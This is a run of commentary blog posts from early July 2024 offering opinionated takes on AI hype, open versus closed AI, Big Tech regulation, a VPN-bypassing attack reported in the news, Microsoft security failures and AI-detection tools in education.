Satire or Marketing: Let Smart Software Decide

July 3, 2024

green-dino_thumb_thumb_thumb_thumb_t_thumb_thumbThis essay is the work of a dumb dinobaby. No smart software required.

What’s PhD level intelligence? In 1962, I had a required class in one of the -ologies. I vaguely remember that my classmates and I had to learn about pigeons, rats, and people who would make decisions that struck me as off the wall. The professor was named after a Scottish family from the Highlands. I do recall looking up the name and finding that it meant “crooked nose.” But the nose, as nice as it was, was nothing to the bed springs the good professor suspended from a second story window. I asked him, “What’s the purpose of the bed springs?” (None of the other students in the class cared, but I found the sight interesting.) His reply was, “I am using it as an antenna.” Okay, that is one example of PhD-level intelligence. I have encountered others, but I will not regale you with are somewhat idiosyncratic behaviors.

image

The illustration demonstrates the common sense approach to problem solving. Thanks, MSFT Copilot. Chugging away on Recall and security over the holiday. Yep, I bet you are.

Why am I thinking about a story about bedsprings suspend from a second story window? I just read “ChatGPT Now Has PhD Level Intelligence, and the Poor Personal Choices to Prove It.” The write up states:

ChatGPT has become indispensable to plagiarists and spambots worldwide. Now, OpenAI is thrilled to introduce ChatGPT 5.0, the most advanced version of the popular virtual assistant to date. With groundbreaking improvements, GPT-5 is like having a doctor of philosophy right at your fingertips.

The write up (in a humorous vein I really hope) identifies some characteristics of the next big thing from Sam AI-Man, the Apple partner he hopes. The article suggests that ChatGPT 5 can cherish a saloon mug with this snappy phrase printed on the container:

Suck it up, liver.

No, I don’t want the mug, nor have I abused my liver as an undergraduate. I actually enjoyed spending time in the so-called university’s library.

The write up includes an short commentary about the ethical concerns or guardrails Sam AI-Man has on the Information Highway populated with smart vehicles and presumably less smart humans who are confident the zeros and ones don’t get scrambled:

Numerous questions have arisen regarding the ethics and legality of training ChatGPT on copyrighted text data without permission. In this latest version, however, reliance on authors’ intellectual property has been dramatically reduced. While GPT-5 started training from a knowledge base of millions of texts, it got around to reading only Frankenstein, plus maybe half of a Donna Haraway book. It basically bluffed its way through prelims by talking about “embodiment” a lot.

I get the Mary Shelly reference. But Donna Haraway forced me to ask Claude Sonnet 3.5, “Please, explain Donna Haraway’s contribution to ethical discourse.” Here’s what I received from the smart system competing with Sam AI-Man’s presumably smarter system:

Here’s Donna Haraway’s contribution to ethical discourse in three sentences:

  1. Donna Haraway challenged traditional ideas about what it means to be human by introducing the concept of a “cyborg” – a blend of human and machine.
  2. She argued that the lines between nature and culture, human and animal, and physical and non-physical are not as clear as we think, which forces us to rethink our ethical responsibilities.
  3. Her work encourages us to consider how technology and science affect our understanding of ourselves and our relationships with other living things, pushing us to develop new ethical frameworks for our changing world.

Thank you, Claude Sonnet 3.5! I have stated that my IQ score pegs me in the “Dumb Cod” percentile. I think Ms. Haraway is into the Ray Kurzweil and Elon Musk concept space. I know I am looking forward to nanodevices able to keep me alive for many, many years. I want to poke fun at smart software, and I quite like to think about PhD level software.

To close, I want to quote the alleged statement of a very smart person who could not remember if OpenAI used YouTube-type content to train ChatGPT. (Hey, even crooked nose remembered that he suspended the bed springs to function like an antenna.) The CTO of OpenAI allegedly said:

“If you look at the trajectory of improvement, systems like GPT-3 were maybe toddler-level intelligence… and then systems like GPT-4 are more like smart high-schooler intelligence. And then, in the next couple of years, we’re looking at PhD intelligence…” — Open AI CTO Mira Murati, in an interview with Dartmouth Engineering

I wonder if a person without a PhD can recognize “PhD intelligence”? Sure. Why not? It’s marketing.

Stephen E Arnold, July 3, 2024

Can Big Tech Monopolies Get Worse?

July 3, 2024

Monopolies are bad. They’re horrible for consumers because of high prices, exploitation, and control of resources. They also kill innovation, control markets, and influence politics. A monopoly is only good when it is a reference to the classic board game (even that’s questionable because the game is known to ruin relationships). Legendary tech and fiction writer Cory Doctorow explains that technology companies want to maintain their stranglehold on the economy,, industry, and world in an article on the Electronic Frontier Foundation (EFF): “Want Make Big Tech Monopolies Even Worse? Kill Section 230.”

Doctorow makes a humorous observation, referencing Dante, that there’s a circle in Hell worse than being forced to choose a side in a meaningless online flame war. What’s that circle? It’s being threatened with a lawsuit for refusing or complying with one party over another. EFF protects civil liberties on the Internet and digital world. It’s been around since 1990, so the EFF team is very familiar with poor behavior that plagues the Internet. Their first hire was the man who coined Godwin’s Law.

EFF loves Section 230 because it protects people who run online services from being sued by their users. Lawsuits are horrible, time-consuming, and expensive. The Internet is chock full of people who will sue at the stroke of a keyboard. There’s a potential bill that would kill Section 230:

“That’s why we were so alarmed to see a bill introduced in the House Energy and Commerce Committee that would sunset Section 230 as of December 31, 2025, with no provision to protect online service providers from being conscripted into their users’ online disputes and the legal battles that arise from them.

Homely places on the internet aren’t just a curiosity anymore, nor are they merely a hangover from the Web 1.0 era.

In an age of resurgent anti-monopoly activism, small online communities, either standing on their own, or joined in loose “federations,” are the best chance we have to escape Big Tech’s relentless surveillance and clumsy, unaccountable control.”

If Section 230 is destroyed, it will pit big tech companies with their deep pockets against the average user. Big Tech could sue whoever they wanted and it would allow bad actors, including scammers, war criminals, and dictators, to silence their critics. It would also prevent any alternatives to big tech.

So big tech could get worse, although it’s still very bad: kids addicted to screens, misinformation, CSAM, privacy violations, and monopolistic behavior. Maybe we should roll over and hide beneath a rock with an Apple tracker stuck to it, of course.

Whitney Grace, July 3, 2024

Another Open Source AI Voice Speaks: Yo, Meta!

July 3, 2024

dinosaur30a_thumb_thumb_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

The open source software versus closed source software demonstrates ebbs and flows. Like the “go fast” with AI and “go slow” with AI, strong opinions suggest that big money and power are swirling like the storms on a weather app for Oklahoma in tornado season. The most recent EF5 is captured in “Zuckerberg Disses Closed-Source AI Competitors As Trying to Create God.” The US government seems to be concerned about open source smart software finding its way into the hands of those who are not fans of George Washington-type thinking.

image

Which AI philosophy will win the big pile of money? Team Blue representing the Zuck? Or, the rag tag proprietary wizards? Thanks, MSFT Copilot. You are into proprietary, aren’t you?

The “move fast and break things” personage of Mark Zuckerberg is into open source smart software. In the write up, he allegedly said in a YouTube bit:

“I don’t think that AI technology is a thing that should be kind of hoarded and … that one company gets to use it to build whatever central, single product that they’re building,” Zuckerberg said in a new YouTube interview with Kane Sutter (@Kallaway).

The write up includes this passage:

In the conversation, Zuckerberg said there needs to be a lot of different AIs that get created to reflect people’s different interests.

One interesting item in the article, in my opinion, is this:

“You want to unlock and … unleash as many people as possible trying out different things,” he continued. “I mean, that’s what culture is, right? It’s not like one group of people getting to dictate everything for people.”

But the killer Meta vision is captured in this passage:

Zuckerberg said there will be three different products ahead of convergence: display-less smart glasses, a heads-up type of display and full holographic displays. Eventually, he said that instead of neural interfaces connected to their brain, people might one day wear a wristband that picks up signals from the brain communicating with their hand. This would allow them to communicate with the neural interface by barely moving their hand. Over time, it could allow people to type, too. Zuckerberg cautioned that these types of inputs and AI experiences may not immediately replace smartphones, though. “I don’t think, in the history of technology, the new platform — it usually doesn’t completely make it that people stop using the old thing. It’s just that you use it less,” he said.

In short, the mobile phone is going down, not tomorrow, but definitely to the junk drawer.

Several observations which I know you are panting to read:

  1. Never under estimate making something small or re-invented as a different form factor. The Zuck might be “right.”
  2. The idea of “unleash” is interesting. What happens if employees at WhatsApp unleash themselves? How will the Zuck construct react? Like the Google? Something new like blue chip consulting firms replacing people with smart software? “Unleash” can be interpreted in different ways, but I am thinking of turning loose a pack of hyenas. The Zuck may be thinking about eager kindergartners. Who knows?
  3. The Zuck’s position is different from the government officials who are moving toward restrictions on “free and open” smart software. Those hallucinating large language models can be repurposed into smart weapons. Close enough for horseshoes with enough RDX may do the job.

Net net: The Zuck is an influential and very powerful information channel owner. “Unleash” what? Hungry predators or those innovating children? Perhaps neither. But as OpenAI seems to be closing; the Zuck AI is into opening. Ah, uncertainty is unfolding before my eyes in real time.

Stephen E Arnold, July 3, 2024

x

x

Scale Is All You Need for Superintelligence: Interesting Assertion

July 2, 2024

green-dino_thumb_thumb_thumb_thumb_tThis essay is the work of a dumb dinobaby. No smart software required. This blog post includes information from Claude 3.5 Sonnet. The information from smart software is in blue.

At this time, smart software boils down to the “transformer.” I navigated to Claude 3.5 Sonnet and asked the smart software to explain “transformer.” Here’s what the system generated:

The Google Transformer innovation, introduced in 2017, revolutionized natural language processing by introducing a novel architecture that relies entirely on attention mechanisms. This approach allows the model to process input sequences in parallel, rather than sequentially, leading to significant improvements in translation quality and training efficiency. The Transformer’s key features include self-attention, which enables it to capture relationships between words regardless of their position in a sentence, and positional encoding, which helps the model understand word order without relying on recurrent neural networks

I then asked, “Are there other ways to achieve smart software or AI information functions? Claud 3.5 Sonnet spit out this list:

  1. Machine Learning Algorithms
  2. Expert Systems
  3. Neural Networks.

Options are good. But the buzz focuses on transformers, a Google “invention” allegedly a decade old (but some suggest its roots reach back into the mists of time). But let’s stick with the Google and a decade.

image

The future is on the horizon. Thanks, MSFT Copilot. Good enough and you spelled “future” correctly.

Etched Is Making the Biggest Bet in AI” That’s is an interesting statement. The company states what its chip is not:

By burning the transformer architecture into our chip, we can’t run most traditional AI models: the DLRMs powering Instagram ads, protein-folding models like AlphaFold 2, or older image models like Stable Diffusion 2. We can’t run CNNs, RNNs, or LSTMs either. But for transformers, Sohu is the fastest chip of all time.

What does the chip do? The company says:

With over 500,000 tokens per second in Llama 70B throughput, Sohu lets you build products impossible on GPUs. Sohu is an order of magnitude faster and cheaper than even NVIDIA’s next-generation Blackwell (B200) GPUs.

The company again points out the downside of its “bet the farm” approach:

Today, every state-of-the-art AI model is a transformer: ChatGPT, Sora, Gemini, Stable Diffusion 3, and more. If transformers are replaced by SSMs, RWKV, or any new architecture, our chips will be useless.

Yep, useless.

What is Etched’s big concept? The company says:

Scale is all you need for superintelligence.

This means in my dinobaby-impaired understanding that big delivers a really smarter smart software. Skip the power, pipes, and pings. Just scale everything. The company agrees:

By feeding AI models more compute and better data, they get smarter. Scale is the only trick that’s continued to work for decades, and every large AI company (Google, OpenAI / Microsoft, Anthropic / Amazon, etc.) is spending more than $100 billion over the next few years to keep scaling.

Because existing chips are “hitting a wall,” a number of companies are in the smart software chip business. The write up mentions 12 of them, and I am not sure the list is complete.

Etched is different. The company asserts:

No one has ever built an algorithm-specific AI chip (ASIC). Chip projects cost $50-100M and take years to bring to production. When we started, there was no market.

The company walks through the problems of existing chips and delivers it knock out punch:

But since Sohu only runs transformers, we only need to write software for transformers!

Reduced coding and an optimized chip: Superintelligence is in sight. Does the company want you to write a check? Nope. Here’s the wrap up for the essay:

What happens when real-time video, calls, agents, and search finally just work? Soon, you can find out. Please apply for early access to the Sohu Developer Cloud here. And if you’re excited about solving the compute crunch, we’d love to meet you. This is the most important problem of our time. Please apply for one of our open roles here.

What’s the timeline? I don’t know. What’s the cost of an Etched chip? I don’t know. What’s the infrastructure required. I don’t know. But superintelligence is almost here.

Stephen E Arnold, July 2, 2024

Will Google Charge for AI Features? Of Course

July 2, 2024

Will AI spur Google to branch out from its ad-revenue business model? Possibly, Dataconomy concludes in, “AI Is Draining Google’s Money and We May Be Charged for It.” Writer Eray Eliaç?k cites reporting from the Financial Times when stating:

“Google, the search engine used by billions, is considering charging for special features made possible by artificial intelligence (AI). This would be different from its usual practice of offering most of its services for free. Here’s what this could mean: Google might offer some cool AI-driven tools, like a smarter assistant or personalized search options, but only to those who pay for them. The regular Google search would stay free, but these extra features would come with a price tag, such as Gemini, SGE, and Image generation with AI and more.”

Would Google really make more charging for AI than on serving up ads alongside it? Perhaps it will do both?

Eliaç?k reminds us AI is still far from perfect. There are several reasons he does not address:

  1. Google faces a challenge to maintain its ad monopolies as investigations into its advertising business which has been running without interference for more than two decades
  2. AI is likely to be a sector with a big dog and a couple of mid sized dogs, and a bunch of French bulldogs (over valued and stubborn). Google wants to be the winner because it invented the transformer and now has to deal with the consequences of that decision. Some of the pretenders are likely to be really big dogs and capable of tearing off Googzilla’s tail
  3. Cost control is easy to talk about in MBA class and financial columns. In real online life, cost control is a thorny problem. No matter how much the bean counters squeeze, the costs of new gear, innovation, and fixing stuff when it flames out over the weekend blasts many IT budgets into orbit. Yep, even Google’s wizards face this problem.

Net net: Google will have little choice but find a way to monetize clicks, eye balls, customer service, cloud access, storage, and any thing that can be slapped with a price tag. Take that to MBA class.

Cynthia Murrell, July 2, 2024

VPNs, Snake Oil, and Privacy

July 2, 2024

dinosaur30a_thumb_thumb_thumb_thumb_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Earlier this year, I had occasion to meet a wild and crazy entrepreneur who told me that he had the next big thing in virtual private networks. I listened to the words and tried to convert the brightly-covered verbal storm into something I could understand. I failed. The VPN, as I recall the energizer bunny powered start up impresario needed to be reinvented.

6 28 how this for a diagram

Source: https://www.leviathansecurity.com/blog/tunnelvision

I knew that the individual’s knowledge of VPNs was — how shall I phrase it — limited. As an educational outreach, I forwarded to the person who wants to be really, really rich the article “Novel Attack against Virtually All VPN Apps Neuters Their Entire Purpose.” The write up focuses on an exploit which compromises the “secrecy” the VPN user desires. I hopes the serial entrepreneur notes this passage:

“The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the Internet.”

Technical know how is required, but the point is that VPNs are often designed to:

  1. Capture data about the VPN user and other quite interesting metadata. These data are then used either for marketing, search engine optimization, or simple information monitoring.
  2. A way to get from a VPN hungry customer a credit card which can be billed every month for a long, long time. The customer believes a VPN adds security when zipping around from Web site to online service. Ignorance is bliss, and these VPN customers are usually happy.
  3. A large-scale industrial operation which sells VPN services to repackagers who buy bulk VPN bandwidth and sell it high. The winner is the “enabler” or specialized hosting provider who delivers a vanilla VPN service on the cheap and ignores what the resellers say and do. At one of the law enforcement / intel conferences I attended I heard someone mention the name of an ISP in Romania. I think the name of this outfit was M247 or something similar. Is this a large scale VPN utility? I don’t know, but I may take a closer look because Romania is an interesting country with some interesting online influencers who are often in the news.

The write up includes quite a bit of technical detail. There is one interesting factoid that took care to highlight for the VPN oriented entrepreneur:

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn’t implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) a VPN user connecting to an untrusted network has no ability to control the firewall and (2) it opens the same side channel present with the Linux mitigation. The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the Internet through the Wi-Fi network of a cellular device.

What’s this mean? In a nutshell, Google did something helpful. By design or by accident? I don’t know. You pick the option that matches your perception of the Android mobile operating system.

This passage includes one of those observations which could be helpful to the aspiring bad actor. Run the VPN inside of a virtual machine and connect to Internet via a Wi-Fi network or mobile cellular service.

Several observations are warranted:

  1. The idea of a “private network” is not new. A good question to pose is, “Is there a way to create a private network that cannot be detected using conventional traffic monitoring and sniffing tools? Could that be the next big thing for some online services designed for bad actors?
  2. The lack of knowledge about VPNs makes it possible for data harvesters and worse to offer free or low cost VPN service and bilk some customers out of their credit card data and money.
  3. Bad actors are — at some point — going to invest time, money, and programming resources in developing a method to leapfrog the venerable and vulnerable VPN. When that happens, excitement will ensue.

Net net: Is there a solution to VPN trickery? Sure, but that involves many moving parts. I am not holding my breath.

Stephen E Arnold, July 2, 2024

The Check Is in the Mail and I Will Love You in the Morning. I Promise.

July 1, 2024

green-dino_thumb_thumb_thumb_thumbThis essay is the work of a dumb dinobaby. No smart software required.

Have you heard these phrases in a business context?

  • “I’ll get back to you on that”
  • “We should catch up sometime”
  • “I’ll see what I can do”
  • “I’m swamped right now”
  • “Let me check my schedule and get back to you”
  • “Sounds great, I’ll keep that in mind”

image

Thanks, MSFT Copilot. Good enough despite the mobile presented as a corded landline connected to a bank note. I understand and I will love you in the morning. No, really.

I read “It’s Safe to Update Your Windows 11 PC Again, Microsoft Reassures Millions after Dropping Software over Bug.” [If the linked article disappears, I would not be surprised.] The write up says:

Due to the severity of the glitch, Microsoft decided to ditch the roll-out of KB5039302 entirely last week. Since then, the Redmond-based company has spent time investigating the cause of the bug and determined that it only impacts those who use virtual machine tools, like CloudPC, DevBox, and Azure Virtual Desktop. Some reports suggest it affects VMware, but this hasn’t been confirmed by Microsoft.

Now the glitch has been remediated. Yes, “I’ll get back to you on that.” Okay, I am back:

…on the first sign that your Windows PC has started — usually a manufacturer’s logo on a blank screen — hold down the power button for 10 seconds to turn-off the device, press and hold the power button to turn on your PC again, and then when Windows restarts for a second time hold down the power button for 10 seconds to turn off your device again. Power-cycling twice back-to-back should means that you’re launched into Automatic Repair mode on the third reboot. Then select Advanced options to enter winRE. Microsoft has in-depth instructions on how to best handle this damaging bug on its forum.

No problem, grandma.

I read this reassurance the simple steps needed to get the old Windows 11 gizmo working again. Then I noted this article in my newsfeed this morning (July 1, 2024):  “Microsoft Notifies More Customers Their Emails Were Accessed by Russian Hackers.” This write up reports as actual factual this Microsoft announcement:

Microsoft has told more customers that their emails were compromised during a late 2023 cyberattack carried out by the Russian hacking group Midnight Blizzard.

Yep, Russians… again. The write up explains:

The attack began in late November 2023. Despite the lengthy period the attackers were present in the system, Microsoft initially insisted that that only a “very small percentage” of corporate accounts were compromised. However, the attackers managed to steal emails and attached documents during the incident.

I can hear in the back of my mind this statement: “I’ll see what I can do.” Okay, thanks.

This somewhat interesting revelation about an event chugging along unfixed since late 2023 has annoyed some other people, not your favorite dinobaby. The article concluded with this passage:

In April [2023], a highly critical report [pdf] by the US Cyber Safety Review Board slammed the company’s response to a separate 2023 incident where Chinese hackers accessed emails of high-profile US government officials. The report criticized Microsoft’s “cascade of security failures” and a culture that downplayed security investments in favor of new products. “Microsoft had not sufficiently prioritized rearchitecting its legacy infrastructure to address the current threat landscape,” the report said. The urgency of the situation prompted US federal agencies to take action in April [2023]. An emergency directive was issued by the US Cybersecurity and Infrastructure Security Agency (CISA), mandating government agencies to analyze emails, reset compromised credentials, and tighten security measures for Microsoft cloud accounts, fearing potential access to sensitive communications by Midnight Blizzard hackers. CISA even said the Microsoft hack posed a “grave and unacceptable risk” to government agencies.

“Sounds great, I’ll keep that in mind.”

Stephen E Arnold, July 1, 2024

Is There a Problem with AI Detection Software?

July 1, 2024

Of course not.

But colleges and universities are struggling to contain AI-enabled cheating. Sadly, it seems the easiest solution is tragically flawed. Times Higher Education considers, “Is it Time to Turn Off AI Detectors?” The post shares a portion of the new book, “Teaching with AI: A Practical Guide to a New Era of Human Learning” by José Antonio Bowen and C. Edward Watson. The excerpt begins by looking at the problem:

“The University of Pennsylvania’s annual disciplinary report found a seven-fold (!) increase in cases of ‘unfair advantage over fellow students’, which included ‘using ChatGPT or Chegg’. But Quizlet reported that 73 per cent of students (of 1,000 students, aged 14 to 22 in June 2023) said that AI helped them ‘better understand material’. Watch almost any Grammarly ad (ubiquitous on TikTok) and ask first, if you think clicking on ‘get citation‘ or ‘paraphrase‘ is cheating. Second, do you think students might be confused?”

Probably. Some universities are not exactly clear on what is cheating and what is permitted usage of AI tools. At the same time, a recent study found 51 percent of students will keep using them even if they are banned. The boost to their GPAs is just too tempting. Schools’ urge to fight fire with fire is understandable, but detection tools are far from perfect. We learn:

“AI detectors are already having to revise claims. Turnitin initially claimed a 1 per cent false-positive rate but revised that to 4 per cent later in 2023. That was enough for many institutions, including Vanderbilt, Michigan State and others, to turn off Turnitin’s AI detection software, but not everyone followed their lead. Detectors vary considerably in their accuracy and rate of false positives. One study looked at 14 different detectors and found that five of the 14 were only 50 per cent accurate or worse, but four of them (CheckforAI, Winston AI, GPT-2 Output and Turnitin) missed only one of the 18 AI-written samples. Detectors are not all equal, but the best are better than faculty at identifying AI writing.”

But is that ability is worth the false positives? One percent may seem small, but to those students it can mean an end to their careers before they even begin. For institutions that do not want to risk false accusations, the authors suggest several alternatives that seem to make a difference. They advise instructors to discuss the importance of academic integrity at the beginning of the course and again as the semester progresses. Demonstrating how well detection tools work can also have an impact. Literally quizzing students on the school’s AI policies, definitions, and consequences can minimize accidental offenses. Schools could also afford students some wiggle room: allow them to withdraw submissions and take the zero if they have second thoughts. Finally, the authors suggest schools normalize asking for help. If students get stuck, they should feel they can turn to a human instead of AI.

Cynthia Murrell, July 1, 2024

OpenAI: Do You Know What Open Means? Does Anyone?

July 1, 2024

green-dino_thumb_thumb_thumb_thumb_thumbThis essay is the work of a dumb dinobaby. No smart software required.

The backstory for OpenAI was the concept of “open.” Well, the meaning of “open” has undergone some modification. There was a Musk up, a board coup, an Apple announcement that was vaporous, and now we arrive at the word “open” as in “OpenAI.”

image

Open source AI is like a barn that burned down. Hopefully the companies losing their software’s value have insurance. Once the barn is gone, those valuable animals may be gone. Thanks, MSFT Copilot. Good enough. How’s that Windows update going this week?

OpenAI Taking Steps to Block China’s Access to Its AI Tools” reports with the same authority Bloomberg used with its “your motherboard is phoning home” crusade a few years ago [Note: If the link doesn’t render, search Bloomberg for the original story]:

OpenAI is taking additional steps to curb China’s access to artificial intelligence software, enforcing an existing policy to block users in nations outside of the territory it supports. The Microsoft Corp.-backed startup sent memos to developers in China about plans to begin blocking their access to its tools and software from July, according to screenshots posted on social media that outlets including the Securities Times reported on Tuesday. In China, local players including Alibaba Group Holding Ltd. and Tencent Holdings Ltd.-backed Zhipu AI posted notices encouraging developers to switch to their own products.

Let’s assume the information in the cited article is on the money. Yes, I know this is risky today, but do you know an 80-year-old who is not into thrills and spills?

According to Claude 3.5 Sonnet (which my team is testing), “open” means:

Not closed or fastened
Accessible or available
Willing to consider or receive
Exposed or vulnerable

The Bloomberg article includes this passage:

OpenAI supports access to its services in dozens of countries. Those accessing its products in countries not included on the list, such as China, may have their accounts blocked or suspended, according to the company’s guidelines.  It’s unclear what prompted the move by OpenAI. In May, Sam Altman’s startup revealed it had cut off at least five covert influence operations in past months, saying they were using its products to manipulate public opinion.

I found this “real” news interesting:

From Baidu Inc. to startups like Zhipu, Chinese firms are trying to develop AI models that can match ChatGPT and other US industry pioneers. Beijing is openly encouraging local firms to innovate in AI, a technology it considers crucial to shoring up China’s economic and military standing.

It seems to me that “open” means closed.

Another angle surfaces in the Nature Magazine’s article “Not All Open Source AI Models Are Actually Open: Here’s a Ranking.” OpenAI is not alone in doing some linguistic shaping with the word “open.” The Nature article states:

Technology giants such as Meta and Microsoft are describing their artificial intelligence (AI) models as ‘open source’ while failing to disclose important information about the underlying technology, say researchers who analysed a host of popular chatbot models. The definition of open source when it comes to AI models is not yet agreed, but advocates say that ’full’ openness boosts science, and is crucial for efforts to make AI accountable.

Now this sure sounds to me as if the European Union is defining “open” as different from the “open” of OpenAI.

Let’s step back.

Years ago I wrote a monograph about open source search. At that time IDC was undergoing what might charitably be called “turmoil.” Chapters of my monograph were published by IDC on Amazon. I recycled the material for consulting engagements, but I learned three useful things in the research for that analysis of open source search systems:

  1. Those making open source search systems available at free and open source software wanted the software [a] to prove their programming abilities,  [b] to be a foil for a financial play best embodied in the Elastic go-public and sell services “play”; [c] be a low-cost, no-barrier runway to locking in users; that is, a big company funds the open source software and has a way to make money every which way from the “free” bait.
  2. Open source software is a product testing and proof-of-concept for developers who are without a job or who are working in a programming course in a university. I witnessed this approach when I lectured in Tallinn, Estonia, in the 2000s. The “maybe this will stick” approach yields some benefits, primarily to the big outfits who co-opt an open source project and support it. When the original developer gives up or gets a job, the big outfit has its hands on the controls. Please, see [c] in item 1 above.
  3. Open source was a baby buzzword when I was working on my open source search research project. Now “open source” is a full-scale, AI-jargonized road map to making money.

The current mix up in the meaning of “open” is a direct result of people wearing suits realizing that software has knowledge value. Giving value away for nothing is not smart. Hence, the US government wants to stop its nemesis from having access to open source software, specifically AI. Big companies do not want proprietary knowledge to escape unless someone pays for the beast. Individual developers want to get some fungible reward for creating “free” software. Begging for dollars, offering a disabled version of software or crippleware, or charging for engineering “support” are popular ways to move from free to ka-ching. Big companies have another angle: Lock in. Some outfits are inept like IBM’s fancy dancing with Red Hat. Other companies are more clever; for instance, Microsoft and its partners and AI investments which allow “open” to become closed thank you very much.

Like many eddies in the flow of the technology river, change is continuous. When someone says, “Open”, keep in mind that thing may be closed and have a price tag or handcuffs.

Net net: The AI secrets have flown the coop. It has taken about 50 years to reach peak AI. The new angles revealed in the last year are not heart stoppers. That smoking ruin over there. That’s the locked barn that burned down. Animals are gone or “transformed.”

Stephen E Arnold, July 1, 2024

  • Archives

  • Recent Posts

  • Meta